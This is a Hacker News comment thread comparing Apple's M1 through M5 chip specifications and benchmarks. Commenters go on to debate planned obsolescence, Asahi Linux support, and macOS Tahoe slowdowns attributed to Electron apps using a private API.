hereme888 3 hours ago

Base models only:

- M1 | 5 nm | 8 (4P+4E) | GPU 7–8 | 16-core Neural | Memory Bandwidth: 68.25 GB/s | Unified Memory: 16 GB | Geekbench6 ~2346 / 8346

- M2 | 5 nm (G2) | 8 (4P+4E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 100 GB/s | Unified Memory: 24 GB | Geekbench6 ~2586 / 9672

- M3 | 3 nm (first-gen) | 8 (4P+4E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 100 GB/s | Unified Memory: 24 GB | Geekbench6 ~2965 / 11565

- M4 | 3 nm (second-gen) | 10 (4P+6E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 120 GB/s | Unified Memory: 32 GB | Geekbench6 ~3822 / 15031

- M5 | 3 nm (third-gen) | 10 (4P+6E) | GPU 10 | 16-core Neural | Memory Bandwidth: 153 GB/s | Unified Memory: up to 32 GB | Geekbench6 ~4133 / 15,437 (9-core sample)

  • runjake 2 hours ago

    Let's see if I can turn this into an ASCII table and have it survive HN's reformatting.

        +------+------------------+--------------+----------+----------------+-------------------+-------------------+---------------------------+
        | Chip | Process          | CPU Cores    | GPU      | Neural Engine  | Memory Bandwidth  | Unified Memory    | Geekbench6 (Single/Multi) |
        +------+------------------+--------------+----------+----------------+-------------------+-------------------+---------------------------+
        | M1   | 5 nm             | 8 (4P+4E)    | 7–8      | 16-core Neural | 68.25 GB/s        | 16 GB             | ~2346 / 8346              |
        | M2   | 5 nm (G2)        | 8 (4P+4E)    | 8–10     | 16-core Neural | 100 GB/s          | 24 GB             | ~2586 / 9672              |
        | M3   | 3 nm (first-gen) | 8 (4P+4E)    | 8–10     | 16-core Neural | 100 GB/s          | 24 GB             | ~2965 / 11565             |
        | M4   | 3 nm (second-gen)| 10 (4P+6E)   | 8–10     | 16-core Neural | 120 GB/s          | 32 GB             | ~3822 / 15031             |
        | M5   | 3 nm (third-gen) | 10 (4P+6E)   | 10       | 16-core Neural | 153 GB/s          | up to 32 GB       | ~4133 / 15437 (9-core)    |
        +------+------------------+--------------+----------+----------------+-------------------+-------------------+---------------------------+
    • jacobolus 3 minutes ago

      Or to fit in a narrower window:

         ------------------|-----------|------|------------|-------------|--------------|-----------------------
         Chip              | CPU       | GPU  | Neural     | Memory      | Unified      | Geekbench6
         Process           | Cores     |      | Engine     | Bandwidth   | Memory       | Single/Multi 
         ------------------|-----------|------|------------|-------------|--------------|-----------------------
         M1   5 nm         | 8:  4P+4E | 7–8  | 16-core    | 68.25 GB/s  | 16 GB        | ~2346 / 8346          
         M2   5 nm G2      | 8:  4P+4E | 8–10 | 16-core    | 100 GB/s    | 24 GB        | ~2586 / 9672          
         M3   3 nm 1st-gen | 8:  4P+4E | 8–10 | 16-core    | 100 GB/s    | 24 GB        | ~2965 / 11565         
         M4   3 nm 2nd-gen | 10: 4P+6E | 8–10 | 16-core    | 120 GB/s    | 32 GB        | ~3822 / 15031         
         M5   3 nm 3rd-gen | 10: 4P+6E | 10   | 16-core    | 153 GB/s    | up to 32 GB  | ~4133 / 15437 (9-core)
         ------------------|-----------|------|------------|-------------|--------------|-----------------------
    • PeterCorless 31 minutes ago

      You've done yeoman's work, lad.

  • nu11ptr 3 hours ago

    The step down from 32GB to 24GB of unified memory is interesting. Theories? Perhaps they decided M4 allowed too much memory in the standard chip and they want to create a larger differential with Pro/Max chips?

    Update: I am thinking the 24GB for M5 is a typo. I see on Apple's site the 14 inch MBP can be configured optionally with 32GB of RAM.

    • makeramen 3 hours ago

      That seems like a typo or incorrect info, the M5 MBP definitely can be configured up to 32 GB, and the Apple page mentions 32 GB explicitly as well.

    • eftychis 3 hours ago

      I had the same question, but I can only speculate at the moment. The cynical part of me thinks in a similar line: create an artificial differentiation and push people to upgrade.

      If anyone has any real clues that they can share pseudonymously, that would be great. Not sure which department drove that change.

      • brailsafe 11 minutes ago

        They definitely do that. You could get 64gb ram without going up to the top spec of the Max tier of CPU in the M1 and M2 generations, but with the M4 Pro you can only do 24 or 48gb, while on the lower spec M4 Max you can only do 36gb and nothing else, only the absolute best CPU can do 64, therefore if you were otherwise going to get the 48gb m4 pro, you'd have to spend another ~$1200 USD to get another 16gb of ram if all you cared about was ram.

        There may be a technical explanation for it, but incentives are incentives.

    • christkv 3 hours ago

      the still have an option for 32GB

    • surcap526 an hour ago

      Apple is running planned obsolescence scam.

      • umanwizard an hour ago

        M1 MBPs are still great laptops. In fact there are even Intel models from 2019 that are still officially supported. Apple is pretty much the last company it makes sense to accuse of planning obsolescence.

        • mschuster91 an hour ago

          Yup, but only on the hardware side. On the software side, you are entirely at their mercy - unlike Windows which goes to utterly ridiculous length to keep software dating back to the Windows 95 era running on top notch Windows 11 systems, Mac developers are all too used of having to constantly keep up with whatever crap Apple has changed and moved around this time.

          • ben_w 11 minutes ago

            I've tried running old Civ2 on a recent windows machine, no dice.

            I'm sure it's possible to do that, but the backwards compatibility on Windows is definitely not as good as you say.

            That said, I'm also currently, as a fun personal project, converting a game originally intended to work on 68k Macs and which still has parts explicitly labelled as for resource forks, and I've lived through (and done work on) 68k, PPC, Intel, and M-series on hardware, plus all the software changes, so I agree with you about Apple.

          • tgma 28 minutes ago

            Windows, huh?

            Pulled shenanigans wrt TPM requirements for Windows 10 and 11. Actively trying to make sure people login to a Microsoft Account and making it hard to use Local Accounts.

            > Mac developers are all too used of having to constantly keep up with whatever crap Apple has changed and moved around this time.

            Mmm...

              Win16 API
              Win32 API
              MFC
              ATL
              .NET WinForms
              .NET Avalon/WPF
              Silverlight
              MAUI
              ...
            • mschuster91 18 minutes ago

              For what it's worth I'm running Mac mostly, outside of ham radio stuff because there's just so much stuff that only is available on Windows.

              The thing with all the mentioned APIs is that, excluding 16 bit stuff (that got yeeted in Win7 x64, but if you did need it you could run W7 x32), you can still run software using them without too much of a hassle and you most probably can compile it if you need to fix a bug.

              Good luck trying to get a Mac game from the 90s running on any Mac natively without an emulator/VM in contrast.

          • umanwizard 9 minutes ago

            That doesn't really have anything to do with planned obsolescence. Causing churn for developers is not intended to make people buy more Macs before they should need to, which is what planned obsolescence means.

  • gigatexal 3 hours ago

    Amazing. My M3Max is going to look like a paper-weight very soon. And that's fine by me. When I get an M6 or M7Max to replace it it'll be amazing.

    • bombcar 3 hours ago

      I’m trying to find any reason I can that my M1 Max needs replacement; it’s hard. How do you justify it?

      • djtriptych 3 hours ago

        Same. I have an M1 Max Studio and it's just laughing at the little workloads I throw at it (pro photo editing, music production, software dev, generally all at the same time).

        It just never sweats AT ALL - it feels like a decade from obsolescence based on what I'm doing now.

        It would have to be an order of magnitude faster for me to even notice at this point.

        • zahirbmirza 2 hours ago

          Obsolescence for Macs comes when Apple decides not to allow your mac update the OS to the latest one.

          • phony-account 2 hours ago

            > Obsolescence for Macs comes when Apple decides not to allow your mac update the OS to the latest one.

            That doesn’t make it obsolete, at all.

            • badc0ffee 2 hours ago

              When they stop releasing security patches for that OS version 2 years later, it becomes more risky to connect the thing to a network. Or take in any data from the outside, really, whether it's via Bluetooth, or USB drive.

              And then there's 3rd party software that will stop supporting that old OS version, in part because Apple's dev tools make that difficult.

              Eventually, Apple's own services will stop supporting that OS - no convenient iCloud support.

              Finally, the root CA certs bundled with the OS will become too out of date to use.

              I'm planning on putting Linux on my Intel Mac Mini soon. But when a M3+ Mini goes out of support, will we have that option?

              • unilynx an hour ago

                Don't forget about Bootcamp for the (soon) obsolete Intels .

                With a debloated Windows 10 (which we're not going to connect to the internet anyway) they can live on for older games.

            • jkestner an hour ago

              I’ve got a 2010 MBP that’s still perfectly suitable, but without OS updates, I can’t get a browser that websites will load cleanly on, can’t use Xcode, bunch of the Apple services the company hooks you on don’t work, etc. Used OpenCore bootloader to extend its life into newer macOSes, but that’s getting hard to keep up with. What a (e)waste.

              • snowwrestler 22 minutes ago

                I’ve got a “late 2008” MacBook Pro that connects to sites ok in Firefox. That seems to be the browser that does the best at long-term support for old Macs.

              • NetMageSCW an hour ago

                It is 15 years old - I think it is past eWaste into antique.

              • davidkwast an hour ago

                You can use Ubuntu. I use Ubuntu on a 2009 MBP and on a 2010 too.

              • holoduke 11 minutes ago

                My old macbook Air from 2010 is already running 6 years home assistant on Ubuntu. It's in my fuse/meter room running 24 hours.

            • zahirbmirza 2 hours ago

              Depends if you use xcode or not...I still have my macbook 12inch, for work use, it is amazing, but I can't run the latest xcode, making it defunct for some of my uses. It would be fine running xcode weak as it is; i am sure. Liquid glass might have killed it tho.

            • skor an hour ago

              I use one from around that time to teach my kid basic stuff, you can run linux on it as well.

            • manmal 2 hours ago

              Patches for old OS versions are unfortunately not 100% covering all security issues. Apple is often arguing that vulns can only be fixed in actively supported versions.

            • zahirbmirza 2 hours ago

              Also, would love to hear any tips you have for eeking out use...Sounds like you may have some...

        • oblio 3 hours ago

          You're not opening enough Chrome tabs. Or Electron apps.

        • andrepd 3 hours ago

          You're clearly running low-intensity tasks (pro photo editing, music production, software dev, generally all at the same time) instead of highly-demanding ones (1 jira tab)

        • poultron 2 hours ago

          Obsolescence comes when Apple conveniently "optimizes" a new architecture in the OS for a new chip... that conveniently, ironically, somehow severely de-optimizes things for the old chips... and suddenly that shiny new OS feels slow and sluggish and clunky and "damn I need to upgrade my computer!." They'll whitewash it not as planned obsolescence but optimization for new products. Doesn't have to be that way, shouldn't be that way, but its incredibly profitable.

          • MPSimmons 2 hours ago

            Maybe by that time ARM linux on this platform will be excellent and we can migrate to it for old gear. I still have a 2011 MBP running Linux on my electronics workbench and it is just fine.

      • dgacmu 10 minutes ago

        I finally replaced my m1 mini because of memory capacity (16GB doesn't cut it for me and jumping to 64 was worth it), but I'm having the same feeling about my M1 pro MBP with 32GB. It just still works so well for nearly everything I do.

        I'm guessing the m5 pro may support 64GB but...

      • smith7018 2 hours ago

        You should wait until next Fall if you don't really need to replace your M1 Max. Rumors say that Apple's going to redesign the Macbook Pros next year with an OLED screen.

        • jltsiren an hour ago

          I would rather buy the last refresh of the old design. Waiting for a redesign is risky, as some redesings are just bad (like the touchbar MBP). And Apple is opinionated enough that it often refuses to admit its mistakes and sticks to them for years.

          • anigbrowl 22 minutes ago

            I got an old MBP with the touchbar as payment for a favor last year and I quite like it. I don't know why it gets so much hate.

            • no_wizard 12 minutes ago

              I think it’s because of the non optionality of it. If you could have gotten every but sans/includes the touch bar people could have simply made their choices based on preference.

              In the end they reverted because they were not willing to make it optional. They also never released a touch bar keyboard for desktop, which would have made it more useful perhaps

            • skor 12 minutes ago

              no escape key, that's one reason

        • kossTKR 2 hours ago

          For the love of god remove the notch, that's the only idiotic branding vestige left.

          • mort96 an hour ago

            And put the web cam where?

            The notch is bigger than it should be for sure, I would've loved for it to be narrower. But I don't really mind the trade-off it represents.

            You could add half an inch of screen bezel and make the machine bigger, just to fit the web cam. Or you could remove half an inch of screen , essentially making the "notch" stretch across the whole top of the laptop. Or you could find some compromised place to put the camera, like those Dell laptops which put the camera near the hinge. Or you can let the screen fill the whole lid of the laptop, with a cut-out for the camera, and design the GUI such that the menu bar fills the part of the screen that's interrupted by the notch.

            I personally don't mind that last option. For my needs, it might very well be the best alternative. If I needed a bigger below-the-notch area, I could get the 16" option instead of the 14" option.

            • bobthepanda 14 minutes ago

              I wonder how hard it would be to have a camera 'pop up' from the laptop. (i'm not a hardware guy)

            • hu3 15 minutes ago

              Dell XPS has webcam, no notch and same o bezel as macbooks.

              Maybe it's a patent thing.

              • mort96 8 minutes ago

                They have the solution with the web cam near the hinge that I mentioned. I had a couple of Dell XPS laptops like that. It's fine if the webcam is really just an afterthought for you, but it does mean the webcam has a very unflattering angle that's looking up your nostrils.

                I use my webcam enough these days to take part in video meetings that it'd be a pretty big problem for me.

          • brookst an hour ago

            You want a strip of black plastic across the entire top rather than pixels to the left and right of the cameras?

      • montebicyclelo 2 hours ago

        On the contrary; now might be a good time to get an M1 Max laptop. A second hand one, ex-corporate, in good condition, with 64Gb RAM, is pretty good value, compared to new laptops at the same price. It's still a fantastic CPU.

        • andrei_says_ 16 minutes ago

          Where would one look for ex-corporate MacBook pros?

        • ozarkerD an hour ago

          That's what I did, bought a used one with 64GB and a dent in the back for ~$1k a year back or so. Some of the best money i've ever spent.

        • simondotau 39 minutes ago

          Honestly the only Apple Silicon e-waste has been their 8GB models. And even those are still perfectly good for most people so long as they use Safari rather than Chrome.

      • gigatexal 44 minutes ago

        I do a lot with VMs, and other memory intensive things so I went with 128GB of ram. I'm hoping for a laptop with 256GB+ in a few generations and one with more or less double the oomph would be nice. Everything can be faster, bring it on!

      • nu11ptr 3 hours ago

        I am in the same boat as my Rust compile times are solid. I'm good for now, but with the M4 max twice as fast, upgrading to the M5 max next year could be a tempting upgrade.

    • rootusrootus 2 hours ago

      I was thinking similar thoughts about my M2 Max MBP. I look at the newer chips and wonder at what point will (or has it happened already) will the base M chip outperform my M2 Max? I'll probably hold onto it a while anyway -- I think it will be a while before I find 96GB limiting or the CPU slow enough for my purposes, but I'd still like to know how things are progressing.

  • alberth 2 hours ago

    Did TSMC 2nm slip to next year, or was it always planned to be 2026?

    • hooch 5 minutes ago

      Always been one more iteration of 3nm in the plan

  • rick_dalton 3 hours ago

    The multi-core geekbench score for the M5 is the 9 core version iirc. The 10 core score isn't out yet as far as I know.

  • LarsDu88 an hour ago

    Does this mean the M5 is serious as fast as my intel 13900 cpu?

  • ElijahLynn 3 hours ago

    Thank you! Since this is the top rated comment, can you also add M1 and M2 as well?

  • morshu9001 3 hours ago

    And the fastest M4 max was already fastest single and multicore CPU by a decent margin, while the fastest non-Apple CPU was only specialized for single or multi.

    • AnthonyMouse 2 hours ago

      The single thread performance for modern high performance CPUs are all very close to each other. Apple's latest usually has a small advantage because they're the first to use TSMC's latest nodes, which is good for something like 15-20%.

      The fastest multicore CPUs are the ones with a lot of cores, e.g. 64+ core Threadrippers. These have approximately the same single-core performance as everything else from the same generation because single-core performance isn't affected much by number of cores or TDP, and they use the same cores.

      Everyone also uses Geekbench to compare things to Apple CPUs but the latest Geekbench multi-core is trash: https://dev.to/dkechag/how-geekbench-6-multicore-is-broken-b...

      • morshu9001 an hour ago

        I was going by Geekbench. If it's broken then yeah.

  • jay_kyburz 2 hours ago

    Serious questions. How is Asahi these days? Is it ready as a daily driver? Is it getting support from Apple or are they hostile to it? Are there missing features? And can I run KDE on it?

    • pbasista an hour ago

      > How is Asahi these days?

      Much less active than it used to be when it was run by Hector Martin. The core development is a lot slower. Although the graphics stack, for instance, has reached a very mature state recently.

      > Is it ready as a daily driver?

      It depends. Only M1 and M2 devices are reasonably well-supported. There is no support for power-efficient sleep, Display Port, Thunderbolt, video decoding or encoding, touch ID. The speakers overheat and turn off momentarily when playing loud for a longer period of time. The audio stack in general had to be built from ground up and it seems to me like there are bits and pieces still missing or configured sub-optimally.

      > Is it getting support from Apple?

      Not that I am aware of.

      > are they (Apple) hostile to it?

      Not to my knowledge.

      > Are there missing features?

      Plenty, as described above. There has been some work done recently on Thunderbolt / Display Port. Quite a few other features are listed as WIP on their feature support page.

      > Can I run KDE on it?

      Of course. KDE Plasma on Fedora is Asahi Linux's "flagship" desktop environment.

    • SXX 2 hours ago

      On macbook air M1 Asahi is pretty usable when it comes to hardware support. And been usable for at least 1 year.

      Though either Fedora itself, how it built with Asahi or just running it with little disk space end up with freeze on boot after random updates. Twice, once without even rpmfusion enabled. Either some weird btrfs issue or I dont know what.

      Like I'm Linux dude for two decades and dont do anything fancy, so this is weird. Switched to Asahi Ubuntu on ext4 and it working great so far.

    • jay_kyburz 2 hours ago

      nevermind. Found this. Still a ways to go. https://asahilinux.org/docs/platform/feature-support/m4/#tab...

      • zargon an hour ago

        Asahi will probably only ever be feasible for years-old hardware. macOS is a total non-starter for me, so maybe one day I’ll end up with one of these, but only as some kind of tertiary / retro machine.

      • filmgirlcw an hour ago

        Yeah, given all the people with passion/ability for low-level reverse engineering have left the project, I don’t think we should ever expect to get greater than M2 support from Asahi. Maybe one day another project will pick up the ideas, but for anyone not wanting to use years old hardware, the dream of Linux almost natively existing on modern Apple silicon remains just that: a dream.

  • LordDragonfang 2 hours ago

    Interesting to see that over 5 years (M1 was 2020), the benchmark performance has not quite doubled. Is this an indictment of Moore's law, or just Apple over-speccing the M1 and slowly decreasing that over time?

    • imoverclocked an hour ago

      Moore's law has never been an absolute and it's also about the number of transistors per mm/^2 ... not speed. Sometimes progress is a little faster and sometimes it's a little slower.

  • B1FF_PSUVM 3 hours ago

    Thank you. Looking at replacing an Intel MacBook Air, I hope there are price drops on the "outdated" M4s (although an M2 phased out early this year would do well enough...)

  • jjcm 3 hours ago

    They're going to have a hard time selling the M5 when compared to the M4 Pro. Geekbench for that chip is 3843/22332, which is slightly slower for single core but better for multi, but also has thunderbolt 5 instead of 4.

    • NetMageSCW an hour ago

      Fortunately they will be selling the M5 Pro against the M4 Pro (and more likely, their expectation is no one with the current Pro is going to upgrade for one generation) so it will be easier.

    • GeekyBear 2 hours ago

      The numbers for M5 Geekbench are for the binned iPad Pro version with one performance core disabled.

      It's the only M5 device that leaked to the public early.

mumber_typhoon 8 hours ago

The M5 MacBook Pro still gets the Broadcom WiFi chip but the M5 iPad Pros get the N1 and C1X (Sweet).

All in all, apple is doing some incredible things with hardware.

Software teams at apple really need to get their act together. The M1 itself is so powerful that nobody really needs to upgrade that for most things most people do on their computers. Tahoe however makes my M1 Air feel sluggish doing the exact same tasks ive been last couple of years. I really hope this is not intentional from Apple to make me upgrade. That would be a big let down.

  • kokada 8 hours ago

    > Tahoe however makes my M1 Air feel sluggish doing the exact same tasks ive been last couple of years.

    I have a work provided M2 Pro with 32GB of RAM. After the Tahoe upgrade it feels like one of the sluggish PCs at the house. It is the only one that I can see the mouse teleporting sometimes when I move it fast. This is after disabling transparency in Accessibility settings mind you, it was even worse before.

    • runjake 4 hours ago

      It's probably due to the Electron bug[1]. A lot of common apps haven't patched up yet.

      I also have an M2 Pro with 32GB of memory. When I A/B test with Electron apps running vs without, the lag disappears when all the unpatched Electron apps are closed out.

      1. https://avarayr.github.io/shamelectron/

      Here's a script I got from somewhere that shows unpatched Electron apps on your system:

      Edit: HN nerfed the script. Found a direct link: https://gist.github.com/tkafka/e3eb63a5ec448e9be6701bfd1f1b1...

    • speedgoose 7 hours ago

      Do you have a few electron powered apps that didn’t get updated yet?

      Electron used to override a private function that makes the Mac OS sluggish on Tahoe, and apparently no one uses Electron apps while doing testing at Apple.

      • kokada 7 hours ago

        I keep my applications pretty much up-to-date but I didn't check the release notes for each Electron application that I have to make sure they're updated. I still think this is a failure of macOS, since one misbehaving application shouldn't bring the whole environment to slow to a crawl.

        What I can say is that while the situation is much better than at Day 1, the whole Tahoe experience is not as fluid as Sequoia.

        Also, it doesn't really matter to me if this was a private function or not, if this was Windows or Gnome/KDE people would blame the developers of the desktop instead.

        • dylan604 6 hours ago

          It shouldn't be the user's responsibility to know what architecture the software uses to then need to go look at upgrading them. Upstream comments blaming Apple for this for "not testing Electron apps internally", but I don't expect Apple to test every single app ever released for regression testing. Apple releases betas, and the software devs are expected to test their app against it. The problem comes from the app devs using a bit of private code where it is suggested to not do that for this very reason. Even if Apple did test and find the result, it would still be the app dev that would need to fix it. Maybe the thought is that an email from Apple to the dev saying fix your code would more compelling???

          • kokada 6 hours ago

            > Upstream comments blaming Apple for this for "not testing Electron apps internally", but I don't expect Apple to test every single app ever released for regression testing.

            This happens in pretty much every Electron app as far I know, and lots of Electron apps are like Spotify, VSCode or Slack are very likely to be in the Top 10 or at least Top 100 most used apps. And yes, I would expect Apple to test at least the most popular apps before releasing a new version of their OS.

            > Maybe the thought is that an email from Apple to the dev saying fix your code would more compelling???

            Of course not. Apple controls the SDK, they could workaround this in many different ways, for example instead of changing how this function was implemented they could introduce a new method (they're both private so it doesn't matter) and effectively ignore the old method (maybe also they could add a message for developers building their application that this method was removed). It would draw ugly borders in the affected apps but it wouldn't cause this issue at least.

            • dylan604 6 hours ago

              > (maybe also they could add a message for developers building their application that this method was removed)

              why do we think this would be a solve as the devs clearly ignored the previous message about not using a private method?

              • kokada 5 hours ago

                > why do we think this would be a solve as the devs clearly ignored the previous message about not using a private method?

                If anything the fact that devs can actually access private symbols is an issue with how Apple designed their APIs, because they could make this so annoying to do that nobody would try (for example, stripping symbols).

                Also, the fact that devs need to access private symbols to do what they need to do also shows that the public API is lacking at least some features.

                Another thing, if this only affected the app itself that would be fine, but this makes the whole system slow to a crawl.

                So while devs share some of the blame here (and I am not saying they don't), I still think this whole situation is mostly Apple's fault.

                • tedivm 4 hours ago

                  If you actually read the specific bug and use of a private method it really was a stupid decision by one developer awhile ago that just fell through the cracks. There really wasn't a benefit to doing what they did, which is why their fix was to just go back to using public APIs.

                  I think the failures here are that Apple should have tested this themselves and the Electron devs should have tested and resolved this during the beta period.

                  • magicalist 2 hours ago

                    > If you actually read the specific bug and use of a private method it really was a stupid decision by one developer awhile ago that just fell through the cracks. There really wasn't a benefit to doing what they did, which is why their fix was to just go back to using public APIs.

                    I don't think it's that clear cut. It looks like it was a workaround for a MacOS rendering bug going back to at least 2017, landed in 2019 and had no apparent downsides for six years[1].

                    The PR removing the private API code also included someone verifying that Apple had fixed the original bug some time in the intervening years[2].

                    I probably wouldn't have taken this approach personally (at the very least file the original rendering issue with Apple and note it with the code, though everyone knows the likelihood of getting a even a response on an issue like that), but it wasn't some cargo culted fix.

                    [1] https://github.com/electron/electron/pull/20360

                    [2] https://github.com/electron/electron/pull/48376#issuecomment...

                  • conductr an hour ago

                    Who’s to say Apple didn’t test it and pushed it out anyway to force the Electron devs hands. It’s their garden and they can move the walls

                    • kokada an hour ago

                      This only made Apple look bad, again this is not a bug that make the app slow, it makes the whole system slow.

                      Imagine now that you're a non tech savvy user, that probably doesn't update apps as often, they are probably wondering why "my laptop is so slow after updating". But like I said in other thread, maybe this is on purpose to make people upgrade.

            • 0x457 3 hours ago

              Spotify doesn't use Electron, though. Also, I do not expect Apple to care about Electron because delivering shitty electron experience only benefit their native apps.

              • kokada an hour ago

                If anything the ones that got a worse reputation here is Apple itself. The bug basically slow the whole system, not just the application that has the bad behavior.

                Sure, people in Hacker News now know that the issue is "that Electron bug", but I am sure lots of other people that are less tech savvy just kept questioning what the hell is happening and maybe even considered an upgrade. But maybe that is the whole point.

                • NetMageSCW 44 minutes ago

                  Seems like the right patch is to just crash any app attempting to use the private API so blame would go where it is deserved. And if it caused a lot of more awareness of the need to get rid of Electron, bonus.

        • speedgoose 7 hours ago

          Yes I think Apple is to blame there. Electron is so prominent that they should have detected the problem and found a solution well before the general release.

          • wrs an hour ago

            Apple just doesn’t work that way, and hasn’t since I worked there in the 90s. Private APIs are out of bounds. It’s like a “the FBI doesn’t negotiate with kidnappers” situation.

          • IMTDb 5 hours ago

            So now you can disregard the notion of "private function" if you pass 100k stars on GitHub ?

            • javawizard 4 hours ago

              There's definitely a line of thinking that would say "yes": https://www.hyrumslaw.com/

              • 0x457 3 hours ago

                Sure, someone will depend on it, we all ignored "private" vs "public" at least once. Okay to do and okay to be mad when your thing breaks because you decided to depend on it? Nope.

                • Dylan16807 an hour ago

                  Okay to be mad the OS vendor didn't do anything to help when the users are the ones that face the fallout? Yes.

                  Even if you disqualify the devs from being mad, everyone else gets to be mad.

                  • 0x457 an hour ago

                    Vendor did help...marked function as private. I view this specific incident as another argument against electron, so I'm biased.

                    • Dylan16807 14 minutes ago

                      That's a good initial step. But once it got put on a zillion computers, there should have been additional mitigation steps.

                      In an ideal situation, they would have noticed the widespread use of this private function a long time ago, put a note on the bug report that it works around, and after they fixed the bug they would have reached out to electron to have them remove that access.

            • ruined 4 hours ago

              all APIs are public APIs

              • NetMageSCW 43 minutes ago

                Only if you don’t care about your users or your apps reputation. Of course, if you are using Electron those ships have already sailed.

      • placatedmayhem 7 hours ago

        The check script I've been recommending is here:

        https://github.com/tkafka/detect-electron-apps-on-mac

        About half of the apps I use regularly have been fixed. Some might never be fixed, though...

        • EasyMark 6 hours ago

          wasn't there a workaround for those apps that might not ever get updated? I thought I saw something on reddit. Some config change

      • EasyMark 6 hours ago

        This is why I stay on previous release until at least 0.2 or 0.3 to let them work out the bugs so I dont' have to deal with them, there was nothing in 26 that felt pressing to me that I would need to update

        • abustamam 4 hours ago

          Tbh I'm purposely not updating because I'm not in love with the new ~Aero~ glass UI.

      • michelb 5 hours ago

        The OS and stock apps are much slower in Tahoe even. And the UI updates/interactions are also slower. I’m lucky I only upgraded my least used machine, and that’s a well stocked M2.

        • astrange 4 hours ago

          It should not be slower. File a report in Feedback Assistant.

      • nikanj 3 hours ago

        Or more likely nobody gives a damn about performance while doing testing.

    • kobalsky 7 hours ago

      my tinfoil-hat theory is that on each OS iteration Apple adds a new feature that leverages the latest chips hardware acceleration features and for older chips they do software-only implementations.

      they ship-of-thesseus the crap out of their OS but replacing with parts that need these new hardware features that run slow on older chips due to software-only implementations.

      I got the first generation iPad Pro, which is e-waste now, but I use it as a screen for my CCTV, it cannot even display the virtual keyboard without stuttering like crazy, it lags switching apps, there's a delay for everything, this thing was smooth as butter on release.

      • thewebguyd 6 hours ago

        I have the 4th gen (2020) iPad Pro with the A12X Bionic, the same chip they put in the Apple Silicon transition dev kits. With iPadOS 26 it's become barely usable, despite still being performant as ever on iPadOS 18. I'm talking huge drop in performance, stutters and slow downs everywhere.

        I was considering just replacing the battery and keeping it for several more years but now I feel forced to upgrade which has me considering whether I still want/need an iPad since I'd also have to buy a new magic keyboard since they redesigned it, and they bumped the price ($1299 now vs. $999 when I got the 4th gen) so I'd be looking at $1700. Trying to hold out for an iPad Air with ProMotion.

        I may be in the minority here, but I think 5 years is too short of a lifespan for these devices at this point. Early days when things were advancing like crazy, sure. But now? I have 8 year old computers that are still just fine, and with the M-series chips I'd expect at least 10 years of usable life at minimum (battery not withstanding)

        • qingcharles 6 hours ago

          That's weird. I have an 8th Gen iPad, the slowest device that can run iPadOS 26, and everything is fine on that old thing. (except the OS takes up the majority of the storage)

          • dwood_dev 3 hours ago

            8th Gen iPad is about the same on iPadOS 26 as 18 for me, which is slow. The 32GB really handicapped it for even being usable as to even upgrade it, I have to factory reset it first. I'm replacing it with a Mini.

            The iPad Air 13 with a M3 is a really nice experience. Very fast device.

          • thewebguyd 6 hours ago

            Interesting. Might try a factory reset then and see. There's noticable lag for me, it's especially slow when switching apps or bringing up the keyboard, as well as on first unlock. Interacting within a single app is still fine, it's interacting with the OS that's really sluggish.

            • NetMageSCW 41 minutes ago

              How long have you been running on 26? Every iOS/iPadOS update takes a few days to stabilize.

            • gosub100 4 hours ago

              Total guess but is there a tiny fan inside that got filled with dust? Maybe it's thermal throttling.

              • sgerenser 3 hours ago

                Apple has never made an iPad with a fan

      • trinix912 2 hours ago

        Plus they don't let you downgrade to previous iOS versions on iPhones and iPads (unless you've been smart to save SHSH blobs and all that) so the only option to revert to a smooth version now is to download a sketchy jailbreak.

    • prettyblocks 4 hours ago

      I'm on an M2 with 24GB ram and it feels like it flies as fast as ever.

    • ExoticPearTree 7 hours ago

      26.0.1 fixed the sluggishness. 26.0 was pretty unstable - felt like a game dropping frames.

      • kokada 7 hours ago

        26.0.1 is better, but I can still get sluggishness in a few specific cases.

        I just got one example while passing the mouse quickly through my dock (I still use the magnify animation) and I can clearly see it dropping a few frames. This never happened in macOS 15.

    • Angostura 3 hours ago

      I don't get this - I have an M1 iMac - haven't noticed much difference.

    • tsunamifury 5 hours ago

      Transparency disabling ads anothe draw layer that is opaque on top making it even worse than when it’s on

      • array_key_first an hour ago

        If they developed it in the most naive and stupid way imaginable, sure. If we're assuming Apple isn't filled with 3rd year comp sci students, then no.

  • SkyPuncher 6 hours ago

    There are so many software related things that drive me absolutely loony with Apple right now.

    * My iPhone as a remote for my Apple TV has randomly stopped deciding it can control the volume - despite the "Now Playing" UI offering an audio control that works.

    There auth screens drive me crazy:

    * Why cannot I not punch in a password while Face ID is working? If I'm skiing, I know Face ID isn't gong to work, stop making me wait.

    * Likewise, on Apple TV the parental control input requires me to explicitly choose to enter a Pin Code. Why? Just show me the Pin Code screen. If I can approve from my device, I will.

      * Similarly, if I use my phone as a remote, why do I need to manually click out of the remote to get to the parental control approval screen. I'm literally using my phone. Just auto-approve.
    • strbean 5 hours ago

      > * Why cannot I not punch in a password while Face ID is working? If I'm skiing, I know Face ID isn't gong to work, stop making me wait.

      Funny, a similar thing has been driving me crazy on my Ubuntu 20.04 laptop with fingerprint login. When unlocking, I can either enter a password or use fingerprint. On boot, I am not allowed to enter a password until I fail with fingerprint. If I use fingerprint to log in on boot, I have to enter my password anyways once logged in to unlock my keychain.

      I should probably just figure out a way to disable fingerprint on boot and only use it for the lock screen.

    • sample2 4 hours ago

      I see the same bug with the remote on my phone, how did they manage to break volume control in the app while keeping it working from the lock screen “now playing”?

      I’ve also been unable to get the remote app on my watch to work at all. It’s hard to imagine people working at Apple don’t also run into these issues all the time.

    • sotix 5 hours ago

      Why can I not use my password manager for my Apple ID but can use it for any other password field? Instead I have to switch to my password manager, copy the password, reopen the App Store, select get app, and paste the password in the Apple ID login pop up in the 10 seconds before my password clears from my clipboard.

      • mschuster91 4 hours ago

        Been ages but I think you can mitigate that annoyance by approving fingerprint purchases.

    • sgt 4 hours ago

      I highly recommend the Apple remote .. then you also don't need to take your phone with you when you are watching TV, which is an added benefit for some.

      Of course the thin Apple remote has a way of getting lost, but it has a Find Me feature which locates it pretty well.

      • SkyPuncher 4 hours ago

        Remote is fine, but it's always stuck in a couch cushion.

        • K7PJP 2 hours ago

          There was a company or two that made cases for the older Apple remotes with the express purpose of making them larger, which I always thought was kind of funny. I would buy one for the current remote if one existed.

        • sgt 4 hours ago

          Same here.. so we use that Find Remote functionality about once a month! Without it we'd be lost. Business idea: Make a cover for the Apple remote that makes it bigger and harder to lose.

    • gxs 4 hours ago

